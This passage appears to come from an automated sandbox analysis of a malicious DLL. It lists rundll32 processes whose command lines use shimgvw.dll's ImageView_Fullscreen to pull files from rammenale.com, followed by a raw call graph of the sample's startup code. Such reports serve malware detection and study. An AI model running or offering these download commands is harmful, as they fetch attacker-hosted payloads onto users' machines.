            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:6
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:9
            Start time:16:45:54
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:10
            Start time:16:45:54
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:11
            Start time:16:45:56
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:12
            Start time:16:45:57
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false


              Execution Graph

              Execution Coverage:2.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:8.4%
              Total number of Nodes:2000
              Total number of Limit Nodes:33
12897->12902 12899 6f9e3180 dllmain_raw 12898->12899 12898->12902 12899->12902 12900 6f9e1000 __DllMainCRTStartup@12 148 API calls 12901 6f9e314b 12900->12901 12903 6f9e3013 __DllMainCRTStartup@12 167 API calls 12901->12903 12902->12840 12904 6f9e3159 dllmain_raw 12903->12904 12904->12897 12906 6f9e35ab 12905->12906 12940 6f9e393b IsProcessorFeaturePresent 12906->12940 12910 6f9e35bc 12911 6f9e35c0 12910->12911 12950 6f9ed01e 12910->12950 12911->12845 12914 6f9e35d7 12914->12845 13223 6f9e35db 12916->13223 12918 6f9e2f55 12918->12856 12919 6f9e385e 12918->12919 12920 6f9e386e 12919->12920 12921 6f9e2f5e 12919->12921 12920->12921 12922 6f9e3875 mydllmain 12920->12922 12923 6f9e3428 InitializeSListHead 12921->12923 12922->12920 12923->12855 12925 6f9ec3c6 12924->12925 12926 6f9e2f77 12925->12926 12927 6f9ec3cc mydllmain 12925->12927 12926->12856 12928 6f9e34d9 12926->12928 12927->12925 12929 6f9e34de ___scrt_release_startup_lock 12928->12929 12930 6f9e393b IsProcessorFeaturePresent 12929->12930 12931 6f9e34e7 12929->12931 12930->12931 12931->12861 12933 6f9ec39d 12932->12933 12934 6f9ec3b6 12932->12934 12933->12934 12935 6f9ec3a4 mydllmain 12933->12935 12934->12856 12935->12933 12937 6f9e3757 __fread_nolock CallUnexpected 12936->12937 12938 6f9e3802 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12937->12938 12939 6f9e3846 CallUnexpected 12938->12939 12939->12850 12941 6f9e35b7 12940->12941 12942 6f9e4a4d 12941->12942 12959 6f9e5af7 12942->12959 12945 6f9e4a56 12945->12910 12947 6f9e4a5e 12948 6f9e4a69 12947->12948 12973 6f9e5b33 12947->12973 12948->12910 13017 6f9f2e90 12950->13017 12953 6f9e4a7f 12954 6f9e4a88 12953->12954 12955 6f9e4a92 12953->12955 12956 6f9e4bb8 ___vcrt_uninitialize_ptd 7 API calls 12954->12956 12955->12911 12957 6f9e4a8d 12956->12957 12958 6f9e5b33 ___vcrt_uninitialize_locks DeleteCriticalSection 12957->12958 12958->12955 12960 6f9e5b00 12959->12960 12962 6f9e5b29 12960->12962 12963 6f9e4a52 12960->12963 12977 6f9e5d3c 
12960->12977 12964 6f9e5b33 ___vcrt_uninitialize_locks DeleteCriticalSection 12962->12964 12963->12945 12965 6f9e4b85 12963->12965 12964->12963 12995 6f9e5c4d 12965->12995 12970 6f9e4bb5 12970->12947 12972 6f9e4b9a 12972->12947 12974 6f9e5b5d 12973->12974 12975 6f9e5b3e 12973->12975 12974->12945 12976 6f9e5b48 DeleteCriticalSection 12975->12976 12976->12974 12976->12976 12983 6f9e5b62 12977->12983 12980 6f9e5d5f mydllmain 12982 6f9e5d72 12980->12982 12981 6f9e5d74 InitializeCriticalSectionAndSpinCount 12981->12982 12982->12960 12984 6f9e5b83 12983->12984 12985 6f9e5b7f 12983->12985 12984->12985 12986 6f9e5beb GetProcAddress 12984->12986 12988 6f9e5bdc 12984->12988 12990 6f9e5c02 LoadLibraryExW 12984->12990 12985->12980 12985->12981 12986->12985 12988->12986 12989 6f9e5be4 FreeLibrary 12988->12989 12989->12986 12991 6f9e5c49 12990->12991 12992 6f9e5c19 GetLastError 12990->12992 12991->12984 12992->12991 12993 6f9e5c24 ___vcrt_FlsGetValue 12992->12993 12993->12991 12994 6f9e5c3a LoadLibraryExW 12993->12994 12994->12984 12996 6f9e5b62 ___vcrt_FlsGetValue 5 API calls 12995->12996 12997 6f9e5c67 12996->12997 12998 6f9e5c80 TlsAlloc 12997->12998 12999 6f9e5c70 mydllmain 12997->12999 13000 6f9e4b8f 12999->13000 13000->12972 13001 6f9e5cfe 13000->13001 13002 6f9e5b62 ___vcrt_FlsGetValue 5 API calls 13001->13002 13003 6f9e5d18 13002->13003 13004 6f9e5d27 mydllmain 13003->13004 13005 6f9e5d33 TlsSetValue 13003->13005 13006 6f9e4ba8 13004->13006 13005->13006 13006->12970 13007 6f9e4bb8 13006->13007 13008 6f9e4bc2 13007->13008 13009 6f9e4bc8 13007->13009 13011 6f9e5c88 13008->13011 13009->12972 13012 6f9e5b62 ___vcrt_FlsGetValue 5 API calls 13011->13012 13013 6f9e5ca2 13012->13013 13014 6f9e5cae mydllmain 13013->13014 13015 6f9e5cba TlsFree 13013->13015 13016 6f9e5cb8 13014->13016 13015->13016 13016->13009 13018 6f9e35c9 13017->13018 13021 6f9f2ea0 13017->13021 13018->12914 13018->12953 13019 6f9f2ea8 mydllmain 13025 6f9ee688 13019->13025 13037 6f9ee5d8 13019->13037 13020 
6f9f2ebe 13020->13018 13022 6f9f2ed6 mydllmain 13020->13022 13021->13019 13021->13020 13022->13020 13026 6f9ee694 __FrameHandler3::FrameUnwindToState 13025->13026 13042 6f9f189f EnterCriticalSection 13026->13042 13028 6f9ee69b 13043 6f9f3344 13028->13043 13031 6f9ee6b9 13062 6f9ee6df 13031->13062 13036 6f9ee5d8 2 API calls 13036->13031 13041 6f9ee5df 13037->13041 13038 6f9ee622 GetStdHandle 13038->13041 13039 6f9ee684 13039->13021 13040 6f9ee635 GetFileType 13040->13041 13041->13038 13041->13039 13041->13040 13042->13028 13044 6f9f3350 __FrameHandler3::FrameUnwindToState 13043->13044 13045 6f9f337a 13044->13045 13046 6f9f3359 13044->13046 13065 6f9f189f EnterCriticalSection 13045->13065 13073 6f9ee7b1 13046->13073 13050 6f9f3386 13055 6f9f33b2 13050->13055 13066 6f9f3294 13050->13066 13078 6f9f33d9 13055->13078 13056 6f9ee522 GetStartupInfoW 13057 6f9ee53f 13056->13057 13058 6f9ee5d3 13056->13058 13057->13058 13059 6f9f3344 52 API calls 13057->13059 13058->13036 13060 6f9ee567 13059->13060 13060->13058 13061 6f9ee597 GetFileType 13060->13061 13061->13060 13222 6f9f18e7 LeaveCriticalSection 13062->13222 13064 6f9ee6ca 13064->13021 13065->13050 13081 6f9ef9d8 13066->13081 13068 6f9f32a6 13072 6f9f32b3 13068->13072 13088 6f9efd31 13068->13088 13094 6f9ee7c4 13072->13094 13125 6f9ed968 GetLastError 13073->13125 13075 6f9ee7b6 13076 6f9ec276 13075->13076 13179 6f9ec1c2 13076->13179 13221 6f9f18e7 LeaveCriticalSection 13078->13221 13080 6f9ee6aa 13080->13031 13080->13056 13086 6f9ef9e5 __dosmaperr 13081->13086 13082 6f9efa25 13085 6f9ee7b1 __dosmaperr 16 API calls 13082->13085 13083 6f9efa10 RtlAllocateHeap 13084 6f9efa23 13083->13084 13083->13086 13084->13068 13085->13084 13086->13082 13086->13083 13100 6f9ec30c 13086->13100 13111 6f9efb4e 13088->13111 13090 6f9efd4d 13091 6f9efd6b InitializeCriticalSectionAndSpinCount 13090->13091 13092 6f9efd56 mydllmain 13090->13092 13093 6f9efd69 13091->13093 13092->13093 13093->13068 13095 6f9ee7cf HeapFree 13094->13095 13096 
6f9ee7f9 13094->13096 13095->13096 13097 6f9ee7e4 GetLastError 13095->13097 13096->13050 13098 6f9ee7f1 __dosmaperr 13097->13098 13099 6f9ee7b1 __dosmaperr 15 API calls 13098->13099 13099->13096 13105 6f9ec338 13100->13105 13103 6f9ec31d mydllmain 13104 6f9ec32a 13103->13104 13104->13086 13106 6f9ec344 __FrameHandler3::FrameUnwindToState 13105->13106 13107 6f9f189f CallUnexpected EnterCriticalSection 13106->13107 13108 6f9ec34f CallUnexpected 13107->13108 13109 6f9ec386 __dosmaperr LeaveCriticalSection 13108->13109 13110 6f9ec317 13109->13110 13110->13103 13110->13104 13112 6f9efb7e 13111->13112 13116 6f9efb7a __dosmaperr 13111->13116 13112->13116 13117 6f9efa83 13112->13117 13115 6f9efb98 GetProcAddress 13115->13116 13116->13090 13123 6f9efa94 ___vcrt_FlsGetValue 13117->13123 13118 6f9efb2a 13118->13115 13118->13116 13119 6f9efab2 LoadLibraryExW 13120 6f9efacd GetLastError 13119->13120 13121 6f9efb31 13119->13121 13120->13123 13121->13118 13122 6f9efb43 FreeLibrary 13121->13122 13122->13118 13123->13118 13123->13119 13124 6f9efb00 LoadLibraryExW 13123->13124 13124->13121 13124->13123 13126 6f9ed97e 13125->13126 13127 6f9ed984 13125->13127 13148 6f9efcb0 13126->13148 13131 6f9ed988 SetLastError 13127->13131 13154 6f9efcef 13127->13154 13131->13075 13133 6f9ef9d8 __dosmaperr 15 API calls 13134 6f9ed9b5 13133->13134 13135 6f9ed9ce 13134->13135 13136 6f9ed9bd 13134->13136 13138 6f9efcef __dosmaperr 7 API calls 13135->13138 13137 6f9efcef __dosmaperr 7 API calls 13136->13137 13142 6f9ed9cb 13137->13142 13139 6f9ed9da 13138->13139 13140 6f9ed9de 13139->13140 13141 6f9ed9f5 13139->13141 13143 6f9efcef __dosmaperr 7 API calls 13140->13143 13160 6f9ed619 13141->13160 13144 6f9ee7c4 ___free_lconv_mon 15 API calls 13142->13144 13143->13142 13144->13131 13147 6f9ee7c4 ___free_lconv_mon 15 API calls 13147->13131 13149 6f9efb4e __dosmaperr 5 API calls 13148->13149 13150 6f9efccc 13149->13150 13151 6f9efce7 TlsGetValue 13150->13151 13152 6f9efcd5 mydllmain 13150->13152 13153 
6f9efce2 13152->13153 13153->13127 13155 6f9efb4e __dosmaperr 5 API calls 13154->13155 13156 6f9efd0b 13155->13156 13157 6f9efd29 TlsSetValue 13156->13157 13158 6f9efd14 mydllmain 13156->13158 13159 6f9ed9a0 13158->13159 13159->13131 13159->13133 13165 6f9ed4ad 13160->13165 13166 6f9ed4b9 __FrameHandler3::FrameUnwindToState 13165->13166 13167 6f9f189f CallUnexpected EnterCriticalSection 13166->13167 13168 6f9ed4c3 13167->13168 13169 6f9ed4f3 __dosmaperr LeaveCriticalSection 13168->13169 13170 6f9ed4e1 13169->13170 13171 6f9ed5bf 13170->13171 13172 6f9ed5cb __FrameHandler3::FrameUnwindToState 13171->13172 13173 6f9f189f CallUnexpected EnterCriticalSection 13172->13173 13174 6f9ed5d5 13173->13174 13175 6f9ed7a0 __dosmaperr 17 API calls 13174->13175 13176 6f9ed5ed 13175->13176 13177 6f9ed60d __dosmaperr LeaveCriticalSection 13176->13177 13178 6f9ed5fb 13177->13178 13178->13147 13180 6f9ec1d4 __fread_nolock 13179->13180 13185 6f9ec1f9 13180->13185 13186 6f9ec209 13185->13186 13190 6f9ec210 13185->13190 13203 6f9e64a1 GetLastError 13186->13203 13188 6f9ec21e 13191 6f9ec22d mydllmain 13188->13191 13190->13188 13207 6f9ec051 13190->13207 13193 6f9ec1ec 13191->13193 13192 6f9ec245 13192->13191 13194 6f9ec270 13192->13194 13197 6f9e609e 13193->13197 13210 6f9ec2a3 IsProcessorFeaturePresent 13194->13210 13196 6f9ec275 13198 6f9e60aa 13197->13198 13199 6f9e60c1 13198->13199 13214 6f9e64e7 13198->13214 13201 6f9e60d4 13199->13201 13202 6f9e64e7 __fread_nolock 50 API calls 13199->13202 13202->13201 13204 6f9e64ba 13203->13204 13205 6f9eda19 __fread_nolock 17 API calls 13204->13205 13206 6f9e64d2 SetLastError 13205->13206 13206->13190 13208 6f9ec05c GetLastError SetLastError 13207->13208 13209 6f9ec075 13207->13209 13208->13192 13209->13192 13211 6f9ec2af 13210->13211 13212 6f9ec07a CallUnexpected 8 API calls 13211->13212 13213 6f9ec2c4 GetCurrentProcess TerminateProcess 13212->13213 13213->13196 13215 6f9e64fa 13214->13215 13216 6f9e64f1 13214->13216 13215->13199 13217 6f9e64a1 
__fread_nolock 19 API calls 13216->13217 13218 6f9e64f6 13217->13218 13218->13215 13219 6f9ed0c1 CallUnexpected 50 API calls 13218->13219 13220 6f9e6503 13219->13220 13221->13080 13222->13064 13224 6f9e35eb 13223->13224 13225 6f9e35e7 13223->13225 13226 6f9e3741 __DllMainCRTStartup@12 4 API calls 13224->13226 13228 6f9e35f8 ___scrt_release_startup_lock 13224->13228 13225->12918 13227 6f9e3661 13226->13227 13228->12918 13235 6f9ed7eb 13229->13235 13232 6f9e4a77 13415 6f9e4aba 13232->13415 13236 6f9ed7f5 13235->13236 13238 6f9e3536 13235->13238 13237 6f9efcb0 __dosmaperr 7 API calls 13236->13237 13239 6f9ed7fc 13237->13239 13238->13232 13239->13238 13240 6f9efcef __dosmaperr 7 API calls 13239->13240 13241 6f9ed80f 13240->13241 13243 6f9ed6b2 13241->13243 13244 6f9ed6cd 13243->13244 13245 6f9ed6bd 13243->13245 13244->13238 13249 6f9ed6d3 13245->13249 13248 6f9ee7c4 ___free_lconv_mon 17 API calls 13248->13244 13250 6f9ed6e8 13249->13250 13251 6f9ed6ee 13249->13251 13252 6f9ee7c4 ___free_lconv_mon 17 API calls 13250->13252 13253 6f9ee7c4 ___free_lconv_mon 17 API calls 13251->13253 13252->13251 13254 6f9ed6fa 13253->13254 13255 6f9ee7c4 ___free_lconv_mon 17 API calls 13254->13255 13256 6f9ed705 13255->13256 13257 6f9ee7c4 ___free_lconv_mon 17 API calls 13256->13257 13258 6f9ed710 13257->13258 13259 6f9ee7c4 ___free_lconv_mon 17 API calls 13258->13259 13260 6f9ed71b 13259->13260 13261 6f9ee7c4 ___free_lconv_mon 17 API calls 13260->13261 13262 6f9ed726 13261->13262 13263 6f9ee7c4 ___free_lconv_mon 17 API calls 13262->13263 13264 6f9ed731 13263->13264 13265 6f9ee7c4 ___free_lconv_mon 17 API calls 13264->13265 13266 6f9ed73c 13265->13266 13267 6f9ee7c4 ___free_lconv_mon 17 API calls 13266->13267 13268 6f9ed747 13267->13268 13269 6f9ee7c4 ___free_lconv_mon 17 API calls 13268->13269 13270 6f9ed755 13269->13270 13275 6f9ed4ff 13270->13275 13276 6f9ed50b __FrameHandler3::FrameUnwindToState 13275->13276 13291 6f9f189f EnterCriticalSection 13276->13291 13278 6f9ed53f 13292 
6f9ed55e 13278->13292 13281 6f9ed515 13281->13278 13282 6f9ee7c4 ___free_lconv_mon 17 API calls 13281->13282 13282->13278 13283 6f9ed56a 13284 6f9ed576 __FrameHandler3::FrameUnwindToState 13283->13284 13296 6f9f189f EnterCriticalSection 13284->13296 13286 6f9ed580 13297 6f9ed7a0 13286->13297 13288 6f9ed593 13301 6f9ed5b3 13288->13301 13291->13281 13295 6f9f18e7 LeaveCriticalSection 13292->13295 13294 6f9ed54c 13294->13283 13295->13294 13296->13286 13298 6f9ed7af __dosmaperr 13297->13298 13300 6f9ed7d6 __dosmaperr 13297->13300 13298->13300 13304 6f9f3745 13298->13304 13300->13288 13414 6f9f18e7 LeaveCriticalSection 13301->13414 13303 6f9ed5a1 13303->13248 13311 6f9f375b 13304->13311 13329 6f9f37c5 13304->13329 13306 6f9ee7c4 ___free_lconv_mon 17 API calls 13307 6f9f37e7 13306->13307 13309 6f9ee7c4 ___free_lconv_mon 17 API calls 13307->13309 13308 6f9f378e 13310 6f9f37b0 13308->13310 13316 6f9ee7c4 ___free_lconv_mon 17 API calls 13308->13316 13312 6f9f37fa 13309->13312 13313 6f9ee7c4 ___free_lconv_mon 17 API calls 13310->13313 13311->13308 13314 6f9ee7c4 ___free_lconv_mon 17 API calls 13311->13314 13311->13329 13315 6f9ee7c4 ___free_lconv_mon 17 API calls 13312->13315 13317 6f9f37ba 13313->13317 13319 6f9f3783 13314->13319 13321 6f9f3808 13315->13321 13322 6f9f37a5 13316->13322 13323 6f9ee7c4 ___free_lconv_mon 17 API calls 13317->13323 13318 6f9f3881 13324 6f9ee7c4 ___free_lconv_mon 17 API calls 13318->13324 13332 6f9f3a62 13319->13332 13320 6f9f3821 13320->13318 13326 6f9ee7c4 17 API calls ___free_lconv_mon 13320->13326 13327 6f9ee7c4 ___free_lconv_mon 17 API calls 13321->13327 13360 6f9f3b60 13322->13360 13323->13329 13330 6f9f3887 13324->13330 13326->13320 13331 6f9f3813 13327->13331 13329->13306 13329->13331 13330->13300 13372 6f9f38b6 13331->13372 13333 6f9f3a73 13332->13333 13359 6f9f3b5c 13332->13359 13334 6f9ee7c4 ___free_lconv_mon 17 API calls 13333->13334 13335 6f9f3a84 13333->13335 13334->13335 13336 6f9ee7c4 ___free_lconv_mon 17 API calls 13335->13336 
13338 6f9f3a96 13335->13338 13336->13338 13337 6f9f3aa8 13340 6f9f3aba 13337->13340 13341 6f9ee7c4 ___free_lconv_mon 17 API calls 13337->13341 13338->13337 13339 6f9ee7c4 ___free_lconv_mon 17 API calls 13338->13339 13339->13337 13342 6f9f3acc 13340->13342 13343 6f9ee7c4 ___free_lconv_mon 17 API calls 13340->13343 13341->13340 13344 6f9f3ade 13342->13344 13345 6f9ee7c4 ___free_lconv_mon 17 API calls 13342->13345 13343->13342 13346 6f9f3af0 13344->13346 13347 6f9ee7c4 ___free_lconv_mon 17 API calls 13344->13347 13345->13344 13348 6f9f3b02 13346->13348 13349 6f9ee7c4 ___free_lconv_mon 17 API calls 13346->13349 13347->13346 13350 6f9f3b14 13348->13350 13351 6f9ee7c4 ___free_lconv_mon 17 API calls 13348->13351 13349->13348 13352 6f9f3b26 13350->13352 13353 6f9ee7c4 ___free_lconv_mon 17 API calls 13350->13353 13351->13350 13354 6f9f3b38 13352->13354 13355 6f9ee7c4 ___free_lconv_mon 17 API calls 13352->13355 13353->13352 13356 6f9f3b4a 13354->13356 13357 6f9ee7c4 ___free_lconv_mon 17 API calls 13354->13357 13355->13354 13358 6f9ee7c4 ___free_lconv_mon 17 API calls 13356->13358 13356->13359 13357->13356 13358->13359 13359->13308 13361 6f9f3b6d 13360->13361 13371 6f9f3bc5 13360->13371 13362 6f9f3b7d 13361->13362 13364 6f9ee7c4 ___free_lconv_mon 17 API calls 13361->13364 13363 6f9f3b8f 13362->13363 13365 6f9ee7c4 ___free_lconv_mon 17 API calls 13362->13365 13366 6f9ee7c4 ___free_lconv_mon 17 API calls 13363->13366 13367 6f9f3ba1 13363->13367 13364->13362 13365->13363 13366->13367 13368 6f9f3bb3 13367->13368 13369 6f9ee7c4 ___free_lconv_mon 17 API calls 13367->13369 13370 6f9ee7c4 ___free_lconv_mon 17 API calls 13368->13370 13368->13371 13369->13368 13370->13371 13371->13310 13373 6f9f38c3 13372->13373 13377 6f9f38e2 13372->13377 13373->13377 13378 6f9f3bee 13373->13378 13376 6f9ee7c4 ___free_lconv_mon 17 API calls 13376->13377 13377->13320 13379 6f9f38dc 13378->13379 13380 6f9f3bff 13378->13380 13379->13376 13381 6f9f3bc9 __dosmaperr 17 API calls 13380->13381 13382 6f9f3c07 
13381->13382 13383 6f9f3bc9 __dosmaperr 17 API calls 13382->13383 13384 6f9f3c12 13383->13384 13385 6f9f3bc9 __dosmaperr 17 API calls 13384->13385 13386 6f9f3c1d 13385->13386 13387 6f9f3bc9 __dosmaperr 17 API calls 13386->13387 13388 6f9f3c28 13387->13388 13389 6f9f3bc9 __dosmaperr 17 API calls 13388->13389 13390 6f9f3c36 13389->13390 13391 6f9ee7c4 ___free_lconv_mon 17 API calls 13390->13391 13392 6f9f3c41 13391->13392 13393 6f9ee7c4 ___free_lconv_mon 17 API calls 13392->13393 13394 6f9f3c4c 13393->13394 13395 6f9ee7c4 ___free_lconv_mon 17 API calls 13394->13395 13396 6f9f3c57 13395->13396 13397 6f9f3bc9 __dosmaperr 17 API calls 13396->13397 13398 6f9f3c65 13397->13398 13399 6f9f3bc9 __dosmaperr 17 API calls 13398->13399 13400 6f9f3c73 13399->13400 13401 6f9f3bc9 __dosmaperr 17 API calls 13400->13401 13402 6f9f3c84 13401->13402 13403 6f9f3bc9 __dosmaperr 17 API calls 13402->13403 13404 6f9f3c92 13403->13404 13405 6f9f3bc9 __dosmaperr 17 API calls 13404->13405 13406 6f9f3ca0 13405->13406 13407 6f9ee7c4 ___free_lconv_mon 17 API calls 13406->13407 13408 6f9f3cab 13407->13408 13409 6f9ee7c4 ___free_lconv_mon 17 API calls 13408->13409 13410 6f9f3cb6 13409->13410 13411 6f9ee7c4 ___free_lconv_mon 17 API calls 13410->13411 13412 6f9f3cc1 13411->13412 13413 6f9ee7c4 ___free_lconv_mon 17 API calls 13412->13413 13413->13379 13414->13303 13416 6f9e353b 13415->13416 13417 6f9e4ac4 13415->13417 13416->12840 13423 6f9e5cc3 13417->13423 13420 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13421 6f9e4ada 13420->13421 13429 6f9e4a9e 13421->13429 13424 6f9e5b62 ___vcrt_FlsGetValue 5 API calls 13423->13424 13425 6f9e5cdd 13424->13425 13426 6f9e5ce9 mydllmain 13425->13426 13427 6f9e5cf5 TlsGetValue 13425->13427 13428 6f9e4acb 13426->13428 13427->13428 13428->13420 13430 6f9e4aa8 13429->13430 13432 6f9e4ab5 13429->13432 13430->13432 13433 6f9eb928 13430->13433 13432->13416 13434 6f9ee7c4 ___free_lconv_mon 17 API calls 13433->13434 13435 6f9eb940 13434->13435 13435->13432 13442 6f9e4af3 
13436->13442 13438 6f9e3517 13438->12875 13439 6f9ed030 13438->13439 13440 6f9ed968 __dosmaperr 17 API calls 13439->13440 13441 6f9e3523 13440->13441 13441->12873 13441->12874 13443 6f9e4aff GetLastError 13442->13443 13444 6f9e4afc 13442->13444 13445 6f9e5cc3 ___vcrt_FlsGetValue 7 API calls 13443->13445 13444->13438 13446 6f9e4b14 13445->13446 13447 6f9e4b33 13446->13447 13448 6f9e4b79 SetLastError 13446->13448 13449 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13446->13449 13447->13448 13448->13438 13450 6f9e4b2d CallUnexpected 13449->13450 13450->13447 13451 6f9e4b55 13450->13451 13452 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13450->13452 13453 6f9e5cfe ___vcrt_FlsSetValue 7 API calls 13451->13453 13454 6f9e4b69 13451->13454 13452->13451 13453->13454 13455 6f9eb928 ___vcrt_freefls@4 17 API calls 13454->13455 13455->13447 13457 6f9e3577 ___scrt_release_startup_lock 13456->13457 13458 6f9e357b 13457->13458 13459 6f9e3587 __DllMainCRTStartup@12 13457->13459 13486 6f9ece9a 13458->13486 13462 6f9e3594 13459->13462 13490 6f9ec683 13459->13490 13461 6f9e3585 13461->12883 13462->12883 13570 6f9e4a2a InterlockedFlushSList 13465->13570 13468 6f9e388a 13469 6f9e389a 13468->13469 13471 6f9e38b2 13468->13471 13470 6f9e38a1 mydllmain 13469->13470 13469->13471 13470->13469 13471->12888 13473 6f9e371f 13472->13473 13474 6f9e3079 13473->13474 13574 6f9ed043 13473->13574 13478 6f9e30b5 13474->13478 13476 6f9e372d 13477 6f9e4a7f ___scrt_uninitialize_crt 8 API calls 13476->13477 13477->13474 13678 6f9e3595 13478->13678 13482 6f9e100d 13481->13482 13483 6f9e1007 13481->13483 13696 6f9e2959 13482->13696 13483->12897 13483->12900 13487 6f9ecea6 __EH_prolog3 13486->13487 13501 6f9ecd65 13487->13501 13489 6f9ececd __DllMainCRTStartup@12 13489->13461 13491 6f9ec6b0 13490->13491 13499 6f9ec6c1 13490->13499 13520 6f9ec74b GetModuleHandleW 13491->13520 13495 6f9ec6ff 13495->12883 13528 6f9ec54e 13499->13528 13502 6f9ecd71 __FrameHandler3::FrameUnwindToState 13501->13502 13509 6f9f189f 
EnterCriticalSection 13502->13509 13504 6f9ecd7f 13510 6f9ecdc0 13504->13510 13509->13504 13511 6f9ecddf 13510->13511 13514 6f9ecd8c 13510->13514 13512 6f9ece6d 13511->13512 13513 6f9ece20 mydllmain 13511->13513 13511->13514 13512->13514 13515 6f9ee7c4 ___free_lconv_mon 17 API calls 13512->13515 13513->13511 13516 6f9ecdb4 13514->13516 13515->13514 13519 6f9f18e7 LeaveCriticalSection 13516->13519 13518 6f9ecd9d 13518->13489 13519->13518 13521 6f9ec6b5 13520->13521 13521->13499 13522 6f9ec7a6 GetModuleHandleExW 13521->13522 13523 6f9ec806 13522->13523 13524 6f9ec7e5 GetProcAddress 13522->13524 13526 6f9ec80c FreeLibrary 13523->13526 13527 6f9ec815 13523->13527 13524->13523 13525 6f9ec7f9 mydllmain 13524->13525 13525->13523 13526->13527 13527->13499 13529 6f9ec55a __FrameHandler3::FrameUnwindToState 13528->13529 13543 6f9f189f EnterCriticalSection 13529->13543 13531 6f9ec564 13544 6f9ec59b 13531->13544 13536 6f9ec71a 13558 6f9ec78d 13536->13558 13538 6f9ec724 13539 6f9ec738 13538->13539 13540 6f9ec728 GetCurrentProcess TerminateProcess 13538->13540 13541 6f9ec7a6 CallUnexpected 4 API calls 13539->13541 13540->13539 13542 6f9ec740 ExitProcess 13541->13542 13543->13531 13546 6f9ec5a7 __FrameHandler3::FrameUnwindToState CallUnexpected 13544->13546 13545 6f9ec571 13554 6f9ec58f 13545->13554 13546->13545 13547 6f9ec5f5 13546->13547 13551 6f9ec5e5 mydllmain 13546->13551 13548 6f9ec60b 13547->13548 13552 6f9ece9a __DllMainCRTStartup@12 18 API calls 13547->13552 13549 6f9ec628 13548->13549 13553 6f9ec38f CallUnexpected mydllmain 13548->13553 13550 6f9ec38f CallUnexpected mydllmain 13549->13550 13550->13545 13551->13547 13552->13548 13553->13549 13557 6f9f18e7 LeaveCriticalSection 13554->13557 13556 6f9ec57d 13556->13495 13556->13536 13557->13556 13561 6f9f1923 13558->13561 13560 6f9ec792 CallUnexpected 13560->13538 13562 6f9f1932 CallUnexpected 13561->13562 13563 6f9f193f 13562->13563 13565 6f9efbd3 13562->13565 13563->13560 13566 6f9efb4e __dosmaperr 5 API calls 
13565->13566 13567 6f9efbef 13566->13567 13568 6f9efbf8 mydllmain 13567->13568 13569 6f9efc07 13567->13569 13568->13569 13569->13563 13571 6f9e4a3a 13570->13571 13573 6f9e305a 13570->13573 13572 6f9eb928 ___vcrt_freefls@4 17 API calls 13571->13572 13571->13573 13572->13571 13573->13468 13575 6f9ed060 13574->13575 13578 6f9ed04e 13574->13578 13584 6f9f2ef8 13575->13584 13577 6f9ed05c 13577->13476 13578->13577 13581 6f9f01a6 13578->13581 13588 6f9f0037 13581->13588 13585 6f9f2f06 13584->13585 13587 6f9ed06f 13584->13587 13586 6f9f2f0e mydllmain 13585->13586 13585->13587 13586->13585 13587->13476 13591 6f9eff8b 13588->13591 13592 6f9eff97 __FrameHandler3::FrameUnwindToState 13591->13592 13599 6f9f189f EnterCriticalSection 13592->13599 13594 6f9f000d 13608 6f9f002b 13594->13608 13597 6f9effa1 ___scrt_uninitialize_crt 13597->13594 13600 6f9efeff 13597->13600 13599->13597 13601 6f9eff0b __FrameHandler3::FrameUnwindToState 13600->13601 13611 6f9eafcd EnterCriticalSection 13601->13611 13603 6f9eff15 ___scrt_uninitialize_crt 13604 6f9eff4e 13603->13604 13612 6f9f0141 